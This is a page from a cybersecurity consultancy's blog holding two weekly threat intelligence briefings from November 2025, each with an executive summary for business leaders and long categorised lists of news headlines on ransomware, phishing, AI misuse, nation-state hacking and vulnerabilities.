Threat Intelligence Blog

Contact our Experts Now

Subscribe to our Weekly Cyber Threat Intelligence Briefing

Black Arrow Admin 30/11/2025 Black Arrow Admin 30/11/2025

Black Arrow Cyber Threat Intelligence Briefing 28 November 2025

Black Arrow Cyber Threat Intelligence Briefing 28 November 2025:

-M&A Risk: Ransomware Hackers Attack SMBs Being Acquired to Try and Gain Access to Multiple Companies

-CrowdStrike Catches Insider Feeding Information to Hackers

-A Third of Workers Risk Cyber Security Breach by Using Work Devices for Personal Use

-Shadow AI Security Breaches Will Hit 40% of All Companies by 2030, Warns Gartner

-New (ISC)2 Report Finds That Vendor Security Gaps Threaten Critical Infrastructure and Supply Chains

-A Fake Windows Update Screen Is Fooling Windows Users into Installing Malware

-FBI: Cybercriminals Stole $262 Million by Impersonating Bank Support Teams Since January

-Compromised Credentials Responsible for 50% of Ransomware Attacks

-Russian and North Korean Hackers Form Alliances

-Alliances Between Ransomware Groups Tied to Recent Surge in Cybercrime

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week we start with an alert on the cyber security risks of mergers and acquisitions: attackers are found to have entered the networks of companies that are later acquired by another organisation, allowing the attackers to enter the acquiring organisation also.

We highlight insider-risks that business leaders should be aware of, including employees who are bribed by attackers, employees using work devices for personal use, and employees using shadow AI. Attacker tactics in this week’s review include attacks via third parties, fake Windows update screens, impersonating the support teams of banks, and using compromised credentials to inflict ransomware attacks. We also see greater collaboration and alliances by attacker groups.

A key part of building stronger cyber security and resilience is understanding how attackers are evolving their tactics. This threat intelligence empowers you to objectively assess how your organisation is susceptible to these tactics and what you need to do to enhance your own security. We strongly recommend that threat intelligence should feature in your leadership training, your incident response exercise and your governance papers; contact us to discuss how we can help you achieve this in a proportionate way.

Governance, Risk and Compliance

UK cyber attacks will inevitably increase, HP boss warns

A third of workers risk cybersecurity breach by using work devices for personal use

Gartner Survey Finds 90% of Non-Executive Directors Lack a Measure of Confidence in Cybersecurity Value

Cybersecurity Is Now a Core Business Discipline - SecurityWeek

Ministers send small businesses cyber threat warning - UKTN

SolarWinds dismissed: what the SEC’s U-turn signals for cyber enforcement | A&O Shearman - JDSupra

Government publishes independent study revealing cost of cyber attacks to UK economy

Political instability is now the defining force behind global business risk | theHRD

Empathy key weapon in cyber fight

We must protect our society against tomorrow's cyber threats - GOV.UK

Root causes of security breaches remain elusive — jeopardizing resilience | CSO Online

Security Is Fragmenting and Converging at the Same Time — Insights from the Field - Security Boulevard

Cyber demand grows following high-profile attacks - Insurance Post

UK Budget 2025: Reactions From Tech Leaders - TechRepublic

3 ways CISOs can win over their boards this budget season | CSO Online

The CISO’s greatest risk? Department leaders quitting | CSO Online

Selling to the CISO: An open letter to the cybersecurity industry | CSO Online

Threats

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

BadAudio malware: How APT24 scaled its cyberespionage through supply chain attacks

Polish minister warns of ongoing 'cyberwar' with Russia - TRT World

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

As Space Becomes Warfare Domain, Cyber Is on the Frontlines

Security is not only military—it is societal. Something worth learning from the Scandinavians

Nation State Actors

Political instability is now the defining force behind global business risk | theHRD

Switching to Offense: US Makes Cyber Strategy Changes

China

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

Four charged with plotting to sneak Nvidia chips into China • The Register

TP-Link sues Netgear, claiming misleading statements on national security risks and alleged ties to state-backed cyberattacks | TechRadar

Alice Guo: Philippines jails 'Chinese spy mayor' for life - BBC News

Russia

Russian Hackers Target US Engineering Firm Because of Work Done for Ukrainian Sister City - SecurityWeek

Polish minister warns of ongoing 'cyberwar' with Russia - TRT World

Russia-linked crooks bought themselves a bank for Christmas • The Register

Russian and North Korean Hackers Form Alliances to Attack Organizations Worldwide

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

Russian Suspected of Cyberattacks on Polish and EU Companies Detained in Krakow - Militarnyi

Russian and North Korean hackers steal 2TB of data from South Korean banks - Cryptopolitan

Iran

Iranian APT hacks helped direct missile strikes in Israel and the Red Sea | CSO Online

North Korea

Russian and North Korean Hackers Form Alliances to Attack Organizations Worldwide

DPRK’s FlexibleFerret Tightens macOS Grip

Russian and North Korean hackers steal 2TB of data from South Korean banks - Cryptopolitan

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Political instability is now the defining force behind global business risk | theHRD

Security is not only military—it is societal. Something worth learning from the Scandinavians

Tools and Controls

Advanced Security Isn't Stopping Old Phishing Tactics

Root causes of security breaches remain elusive — jeopardizing resilience | CSO Online

MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants

Vibe coding feels magical, but it can sink your business fast - here's how | ZDNET

Recognizing and responding to cyber threats: What differentiates NDR, EDR and XDR | CSO Online

3 ways CISOs can win over their boards this budget season | CSO Online

Security teams want automation but 96 percent face problems implementing it - BetaNews

TP-Link sues Netgear, claiming misleading statements on national security risks and alleged ties to state-backed cyberattacks | TechRadar

Other News

Vehicle Hackers Continue Outpacing Cybersecurity Efforts, Expert Says

This tiny Windows shortcut file is a bigger security threat than you think

Ex-CISA officials, CISOs aim to stop the spread of hacklore • The Register

This campaign aims to tackle persistent security myths in favor of better advice | CyberScoop

We must protect our society against tomorrow's cyber threats - GOV.UK

Legacy web forms are the weakest link in government data security | CyberScoop

The Five Eyes Alliance Can’t Afford to Stay Small | Lawfare

Security Is Fragmenting and Converging at the Same Time — Insights from the Field - Security Boulevard

Hackers come for big British retailers | The Observer

Vulnerability Management

Hackers now hide powerful malware in fake Windows updates that look real enough to fool even cautious users easily today | TechRadar

Around 500 million PCs are holding off upgrading to Windows 11, says Dell | The Verge

Fragmented tooling slows vulnerability management - Help Net Security

What happens when vulnerability scores fall apart? - Help Net Security

Vulnerabilities

SonicWall Patches High-Severity Flaws in Firewalls, Email Security Appliance - SecurityWeek

Akira's SonicWall Hacks Are Taking Down Large Enterprises

Fluent Bit vulnerabilities put billions of containers at risk with exploits that could cripple cloud systems across industries | TechRadar

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

Critical Vulnerability in Azure Bastion Let Attackers Bypass Authentication and Escalate privileges

Critical Oracle Identity Manager Flaw Under Attack

WSUS RCE Exploit Used to Deploy ShadowPad Backdoor

Prompt Injections Loom Large Over ChatGPT Atlas Browser

ASUS warns of new critical auth bypass flaw in AiCloud routers

CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability

Microsoft: Out-of-band update fixes Windows 11 hotpatch install loop

Cheap Device Bypasses AMD, Intel Memory Encryption

Grafana warns of max severity admin spoofing vulnerability

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Admin 23/11/2025 Black Arrow Admin 23/11/2025

Black Arrow Cyber Threat Intelligence Briefing 21 November 2025

Black Arrow Cyber Threat Intelligence Briefing 21 November 2025:

-The Trojan Prompt: How GenAI Is Turning Staff Into Unwitting Insider Threats

-Copy And Paste Cyber Security Warning — 99% Of Enterprises Now At Risk

-Google: Threat Groups Will Accelerate Their Use of AI in 2026

-“We’ve Seen a 30% Increase in Successful Email Scams in the Last Two Years”

-“We Are Moments Before the First Real Cyberwar, One in Which Not a Single Shot Is Fired”

-Our Industries Are Vulnerable to Cyber Attacks: Boardrooms Must Prioritize Resilience, Not Reaction

-Overconfidence Is the New Cyber Risk: Immersive’s 2025 Cyber Workforce Benchmark Report Exposes a Global Readiness Illusion

-The Hidden Cost of a Hack: Unpacking the Ripple Effect of Cybercrime

-Half of Ransomware Access Due to Hijacked VPN Credentials

-Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites

-UK Targets Russian Cyber Gang as £14.7 Billion Attacks Hit British Economy

-Cyber-enabled Kinetic Targeting: Iran-linked Actor Uses Cyber Operations to Support Physical Attacks

Executive Summary

This week, we have reviewed several articles in the specialist and general media about the risks presented by AI, in particular generative AI. These include employees pasting sensitive information into public tools, and attackers exploiting the functionality of GenAI such as using Claude to almost completely carry out a cyber espionage operation against organisations. Our review also highlights that the more traditional attack vectors remain a risk for organisations, including hijacked VPNs, weak password controls, and phishing.

Our message to business leaders is clear and unchanged, and supported by various sources included in our review this week: Boards must ensure they have a realistic assessment of their readiness to deal with a cyber attack. It is particularly important that business leaders should be part of the readiness and should not consider the response to be IT focused. This requires an upskilled leadership team to command and govern their cyber security; contact us for details of how we support organisations to achieve this in a proportionate way.

Governance, Risk and Compliance

Overconfidence Is the New Cyber Risk: Immersive’s 2025 Cyber Workforce Benchmark Report Exposes a Global Readiness Illusion

Organizations overconfident in dealing with cybersecurity incidents - BetaNews

Holyrood | Everyone’s a target: The importance of cybersecurity in a fast changing world

Our Industries Are Vulnerable to Cyber-Attacks: Boardrooms Must Prioritize Resilience, Not Reaction - Infosecurity Magazine

The growing risks presented by cyber security and data breaches – The Irish News

The hidden cost of a hack: Unpacking the ripple effect of cybercrime | Insurance Business America

Resilience At Risk: Talent and Governance in the Age of AI - Infosecurity Magazine

The realities of CISO burnout and exhaustion | CyberScoop

SEC to Drop Controversial SolarWinds Cyberattack Lawsuit

Unpreparedness for risks a worry for CEOs: Kroll Chief Jacob Silverman - The Economic Times

Learning Sales Skills Make Security Pros More Effective

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns

Half of Ransomware Access Due to Hijacked VPN Credentials - Infosecurity Magazine

Russian money launderers bought a bank to disguise ransomware profit | Computer Weekly

How Kraken ransomware benchmarks your system first, then encrypts everything without warning, and steals data in the background silently | TechRadar

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

UK cyber ransom ban risks collapse of essential services

The ransomware payment debate: what it means for organizations | TechRadar

'The Gentlemen' Ransomware Group with Dual-Extortion Strategy Encrypts and Exfiltrates Data

Akira ransomware expands to Nutanix AHV, raising stakes for enterprise security | CSO Online

Cat’s Got Your Files: Lynx Ransomware – The DFIR Report

Ransomware Victims

Oracle Allegedly Breached by Clop Ransomware via E-Business Suite 0-Day Hack

Checkout.com snubs hackers after data breach, to donate ransom instead

Jaguar Land Rover confirms major disruption and £196M cost from September cyberattack

Logitech confirms data breach after Clop extortion attack

Hackers Allegedly Claim Leak of LG Source Code, SMTP, and Hardcoded Credentials

The Washington Post reveals thousands impacted via Oracle-based hack | Cybernews

Everest Ransomware Group Allegedly Exposes 343 GB of Sensitive Data in Major Under Armour Breach

Cornerstone staffing ransomware attack leaks 120,000 resumes, claims Qilin gang | Cybernews

Hacker claims to steal 2.3TB data from Italian rail group, Almaviva

Phishing & Email Based Attacks

Beware! How AI is writing phishing emails that look real | PCWorld

AI Is Supercharging Phishing: Here’s How to Fight Back - SecurityWeek

Beware of Phishing Emails as Spam Filter Alerts Steal Your Email Logins in a Blink

Attackers are using “Sneaky 2FA” to create fake sign-in windows that look real | Malwarebytes

Sneaky2FA PhaaS kit now uses redteamers' Browser-in-the-Browser attack

“We've seen a 30% increase in successful email scams in the last two years” | Ctech

The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA

State Special Communications warned of a new cyber threat: which emails should not be opened and why | УНН

Other Social Engineering

Copy And Paste Cybersecurity Warning — 99% Of Enterprises Now At Risk

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

The long conversations that reveal how scammers work - Help Net Security

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

Five plead guilty to helping North Koreans infiltrate US firms

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

Five admit helping North Korea evade sanctions through IT worker schemes

DoJ nets five guilty pleas in Pyongyang’s IT-worker hustle • The Register

US: Five Plead Guilty in North Korean IT Worker Fraud Scheme - Infosecurity Magazine

Almost five-fold increase in reports of online investment ad scams

Convenience culture is breaking personal security - Help Net Security

Scammers sent 166,000 scam texts to NY residents this week in major hack | Mashable

Fraud, Scams and Financial Crime

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

The long conversations that reveal how scammers work - Help Net Security

Don't get ghost tapped: 5 ways to block thieves from scanning your wallet | ZDNET

Almost five-fold increase in reports of online investment ad scams

Convenience culture is breaking personal security - Help Net Security

“We've seen a 30% increase in successful email scams in the last two years” | Ctech

BitQueen jailed as chancellor eyes up her seized £5bn wealth

AI scams surge: how consumers and businesses can stay safe | TechRadar

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

Online safety ‘getting worse’, warns former UK cyber security agency boss | The Standard

Payroll Pirates - Network of Criminal Groups Hijacking Payroll Systems

GenAI and Deepfakes Drive Digital Forgeries and Biometric Fraud - Infosecurity Magazine

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Scammers sent 166,000 scam texts to NY residents this week in major hack | Mashable

US announces new strike force targeting Chinese crypto scammers

Artificial Intelligence

Gartner: 40% of Firms to Be Hit By Shadow AI Security Incidents - Infosecurity Magazine

Beware! How AI is writing phishing emails that look real | PCWorld

AI Is Supercharging Phishing: Here’s How to Fight Back - SecurityWeek

Chinese spies used Claude to break into critical orgs • The Register

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work | CyberScoop

AI chatbots can now execute cyberattacks almost on their own | Vox

What the Anthropic Report on AI Espionage Means for Security Leaders - Intezer

Anthropic Has Some Key Advice for Businesses in the Aftermath of a Massive AI Cyberattack

The Trojan Prompt: How GenAI is Turning Staff into Unwitting Insider Threats - Security Boulevard

Could years of AI conversations be your biggest security blind spot? | IT Pro

How attackers use patience to push past AI guardrails - Help Net Security

Dark LLMs Are Targeting MSPs’ Customers | MSSP Alert

AI Is Supercharging Disinformation Warfare | Foreign Affairs

Google: Threat Groups Will Accelerate Their Use of AI in 2026 | MSSP Alert

“We are moments before the first real cyberwar, one in which not a single shot is fired | Ctech

Convenience culture is breaking personal security - Help Net Security

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

ChatGPT, Gemini, and Claude tested under extreme prompts reveal shocking weaknesses no one expected in AI behavior safeguards | TechRadar

Shadow AI: the next frontier of unseen risk | TechRadar

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Microsoft Warns Windows 11 AI Can Install Malware

Perplexity's Comet AI browser may have some concerning security flaws which could let hacker hijack your device | TechRadar

GenAI and Deepfakes Drive Digital Forgeries and Biometric Fraud - Infosecurity Magazine

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

An "AI Exposure Gap" could be the most worrying security issue your business isn't aware of | TechRadar

Agentic AI puts defenders on a tighter timeline to adapt - Help Net Security

How AI can magnify your tech debt - and 4 ways to avoid that trap | ZDNET

Don't ignore the security risks of agentic AI - SiliconANGLE

Cursor Issue Paves Way for Credential-Stealing Attacks

UK’s infrastructure cyber resilience questioned after first AI-orchestrated attack confirmed | New Civil Engineer

Orange, École Polytechnique Join Forces to Boost AI & Cybersecurity Research for European Digital Sovereignty

2FA/MFA

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

Attackers are using “Sneaky 2FA” to create fake sign-in windows that look real | Malwarebytes

The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA

Malware

Microsoft Warns Windows 11 AI Can Install Malware

SilentButDeadly - Network Communication Blocker Tool That Neutralizes EDR/AV

MacOS DigitStealer malware poses as DynamicLake, targets Apple Silicon M2/M3 devices - Help Net Security

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT

New npm Malware Campaign Redirects Victims to Crypto Sites - Infosecurity Magazine

Google exposes BadAudio malware used in APT24 espionage campaigns

Why ‘AI-Powered’ Cyber-Attacks Are Not a Serious Threat …Yet - Infosecurity Magazine

LLM-generated malware improving, but not operational (yet) • The Register

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

Google Finds New Malware Backdoors Linked to Iran

Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks

Bots/Botnets

Largest Azure DDoS Attack Powered by Aisuru Botnet - SecurityWeek

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

Mobile

'Unremovable Israeli spyware' on your Samsung phone? Here's what the controversy is all about - Android Authority

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Multi-threat Android malware Sturnus steals Signal, WhatsApp messages

Budget Samsung phones shipped with unremovable spyware, say researchers | Malwarebytes

WhatsApp easily exposed 3.5 billion people's phone numbers - GSMArena.com news

New Android malware can capture private messages, researchers warn | The Record from Recorded Future News

CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

WhatsApp 'Eternidade' Trojan Worms Through Brazil

Some Samsung data is being sold by a hacker, but you have nothing to worry about - SamMobile - SamMobile

NSO Group argues WhatsApp injunction threatens existence, future U.S. government work | CyberScoop

Denial of Service/DoS/DDoS

Microsoft Mitigates Record 15.72 Tbps DDoS Attack Driven by AISURU Botnet

A Perfect Storm: DDoS Attack Hits Turkish Luxury Retailer During Fall Collection Launch - Security Boulevard

Internet of Things – IoT

Cybersecurity risks inside the powertrain: why EVs need defence at the motor level - Just Auto

Data Breaches/Leaks

Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites - Infosecurity Magazine

Schools share blame for PowerSchool mega-hack, say watchdogs • The Register

MoD ‘knew using Excel was risky before Afghan data leak’

Hackers Allegedly Claim Leak of LG Source Code, SMTP, and Hardcoded Credentials

The Washington Post reveals thousands impacted via Oracle-based hack | Cybernews

Everest Ransomware Group Allegedly Exposes 343 GB of Sensitive Data in Major Under Armour Breach

WhatsApp easily exposed 3.5 billion people's phone numbers - GSMArena.com news

Major Urssaf cyberattack in France affects 1.2 million Pajemploi users

Eurofiber admits crooks swiped data from French unit • The Register

Pentagon and soldiers let too many secrets slip on socials • The Register

Some Samsung data is being sold by a hacker, but you have nothing to worry about - SamMobile - SamMobile

Organised Crime & Criminal Actors

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

Online safety ‘getting worse’, warns former UK cyber security agency boss | The Standard

Payroll Pirates - Network of Criminal Groups Hijacking Payroll Systems

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Dutch police takes down bulletproof hosting hub linked to 80+ cybercrime cases

CISA Issues New Guidance on Bulletproof Hosting Threat - Infosecurity Magazine

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

BitQueen jailed as chancellor eyes up her seized £5bn wealth

Europol Operation Disrupts $55m in Cryptocurrency for Piracy - Infosecurity Magazine

Wind farm worker sentenced after turning turbines into a secret crypto mine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

New npm Malware Campaign Redirects Victims to Crypto Sites - Infosecurity Magazine

Security researcher calls BS on Coinbase breach timeline • The Register

US announces new strike force targeting Chinese crypto scammers

Insider Risk and Insider Threats

The Trojan Prompt: How GenAI is Turning Staff into Unwitting Insider Threats - Security Boulevard

Rogue techie pleads guilty in $862K employer attack • The Register

Wind farm worker sentenced after turning turbines into a secret crypto mine

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

The Password Was ‘Password’: Why Humans Keep Breaking the Internet

Insurance

What insurers really look at in your identity controls - Help Net Security

What security pros should know about insurance coverage for AI chatbot wiretapping claims - Help Net Security

Supply Chain and Third Parties

Dark LLMs Are Targeting MSPs’ Customers | MSSP Alert

Cloud/SaaS

Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses

Cloudflare hit by outage affecting Global Network services

And so this is how a tiny Cloudflare update broke huge chunks of the internet | TechSpot

Outages

Cloudflare hit by outage affecting Global Network services

And so this is how a tiny Cloudflare update broke huge chunks of the internet | TechSpot

The internet isn't free: Shutdowns, surveillance and algorithmic risks - Help Net Security

Identity and Access Management

What insurers really look at in your identity controls - Help Net Security

Encryption

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Dozens of groups call for governments to protect encryption | CyberScoop

Linux and Open Source

5 reasons Kaspersky releasing a Linux antivirus product worries me

Passwords, Credential Stuffing & Brute Force Attacks

Half of Ransomware Access Due to Hijacked VPN Credentials - Infosecurity Magazine

Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites - Infosecurity Magazine

The Password Was ‘Password’: Why Humans Keep Breaking the Internet

The world's most popular passwords are pretty unsurprising - surely we can do better? | TechRadar

Holiday-themed passwords are getting shredded by attackers who know every festive trick people keep repeating across the internet. | TechRadar

Zoomers are officially worse at passwords than 80-year-olds • The Register

Cursor Issue Paves Way for Credential-Stealing Attacks

Social Media

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Convenience culture is breaking personal security - Help Net Security

Pentagon and soldiers let too many secrets slip on socials • The Register

Regulations, Fines and Legislation

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

UK cyber ransom ban risks collapse of essential services

Cyber Security and Resilience (Network and Information Systems) Bill introduced to Parliament | Mayer Brown - JDSupra

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Dozens of groups call for governments to protect encryption | CyberScoop

SEC to Drop Controversial SolarWinds Cyberattack Lawsuit

Cyber Operations on Domestic Networks Redux | Lawfare

Information sharing law’s expiration could squander government vulnerability hunting efforts, senator says | CyberScoop

CISA 2015 Receives Extension - Infosecurity Magazine

Lawmakers reintroduce bill to bolster cybersecurity at Securities and Exchange Commission | The Record from Recorded Future News

Opinion | Shutdown left U.S. more vulnerable to cyberattacks from China, others - The Washington Post

Military Objective or Civilian Object? The Italian National Cybersecurity Agency's Status in Case of Armed Conflict - Lieber Institute West Point

ENISA Is Now a CVE Program Root - DataBreachToday

Top Senate Intel Dem warns of ‘catastrophic’ cyber consequences of Trump admin national security firings, politicization | CyberScoop

Models, Frameworks and Standards

The UK’s Proposed Cyber Security and Resilience Bill | Hogan Lovells - JDSupra

Careers, Working in Cyber and Information Security

Resilience At Risk: Talent and Governance in the Age of AI - Infosecurity Magazine

Learning Sales Skills Make Security Pros More Effective

The retail sector needs a cybersecurity talent incubator | CyberScoop

Law Enforcement Action and Take Downs

Rogue techie pleads guilty in $862K employer attack • The Register

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Wind farm worker sentenced after turning turbines into a secret crypto mine

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

BitQueen jailed as chancellor eyes up her seized £5bn wealth

Europol Operation Disrupts $55m in Cryptocurrency for Piracy - Infosecurity Magazine

Dutch police takes down bulletproof hosting hub linked to 80+ cybercrime cases

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

US announces new strike force targeting Chinese crypto scammers

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

What are the potential punishments and risks of owning a 'dodgy firestick'? | The Standard

Europol Leads Takedown of Thousands of Extremist Gaming Links - Infosecurity Magazine

Misinformation, Disinformation and Propaganda

AI Is Supercharging Disinformation Warfare | Foreign Affairs

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

“We are moments before the first real cyberwar, one in which not a single shot is fired | Ctech

This is a pre-war situation: Chief of the General Staff of the Polish Armed Forces reacted to sabotage and cyberattacks | УНН

Russia preparing for war against NATO says top General

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

UK will not tolerate Chinese spying, minister says after MI5 alert - BBC News

MI5 Warns Lawmakers That Chinese Spies Are Trying to Reach Them via LinkedIn - SecurityWeek

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

Google exposes BadAudio malware used in APT24 espionage campaigns

Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets

Nation State Actors

“We are moments before the first real cyberwar, one in which not a single shot is fired | Ctech

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

Palo Alto CEO tips nations to weaponize quantum by 2029 • The Register

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

Take fight to the enemy, US cyber boss says • The Register

China

Chinese spies used Claude to break into critical orgs • The Register

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work | CyberScoop

What the Anthropic Report on AI Espionage Means for Security Leaders - Intezer

AI doesn't just assist cyberattacks anymore - now it can carry them out | ZDNET

Chinese Nation-State Groups Hijacking Software Updates

UK will not tolerate Chinese spying, minister says after MI5 alert - BBC News

MI5 Warns Lawmakers That Chinese Spies Are Trying to Reach Them via LinkedIn - SecurityWeek

China-aligned threat actor is conducting widespread cyberespionage campaigns | The Record from Recorded Future News

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

Google exposes BadAudio malware used in APT24 espionage campaigns

Opinion | Shutdown left U.S. more vulnerable to cyberattacks from China, others - The Washington Post

Germany lines up new powers to fend off Chinese tech – POLITICO

New WrtHug campaign hijacks thousands of end-of-life ASUS routers

TP-Link accuses rival Netgear of 'smear campaign' • The Register

US announces new strike force targeting Chinese crypto scammers

Russia

This is a pre-war situation: Chief of the General Staff of the Polish Armed Forces reacted to sabotage and cyberattacks | УНН

Russia preparing for war against NATO says top General

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

UK, US and Australia Sanction Russian Bulletproof Hoster Media Land - Infosecurity Magazine

UK hits Russian cyber gang as £14.7 billion attacks damage economy | EasternEye

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

Russian money launderers bought a bank to disguise ransomware profit | Computer Weekly

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

Russia keeps cutting mobile internet, and people are getting fed up - The Washington Post

Russian hackers 'accessed intimate details of thousands of couples at IVF clinics across UK' | News UK | Metro News

This notorious Russian surveillance tech maker has been hacked - could it be the end for Protei? | TechRadar

Major Russian insurer facing widespread outages after cyberattack | The Record from Recorded Future News

Iran

Cyber-enabled kinetic targeting: Iran-linked actor uses cyber operations to support physical attacks

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets

Iran's Cyber Objectives: What Do They Want?

Google Finds New Malware Backdoors Linked to Iran

Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks

North Korea

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

US: Five Plead Guilty in North Korean IT Worker Fraud Scheme - Infosecurity Magazine

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Europol Leads Takedown of Thousands of Extremist Gaming Links - Infosecurity Magazine

Tools and Controls

Half of Ransomware Access Due to Hijacked VPN Credentials - Infosecurity Magazine

Overconfidence Is the New Cyber Risk: Immersive’s 2025 Cyber Workforce Benchmark Report Exposes a Global Readiness Illusion

Palo Alto kit sees massive surge in malicious activity • The Register

Agentic AI puts defenders on a tighter timeline to adapt - Help Net Security

Fortinet’s delayed alert on actively exploited defect put defenders at a disadvantage | CyberScoop

5 reasons Kaspersky releasing a Linux antivirus product worries me

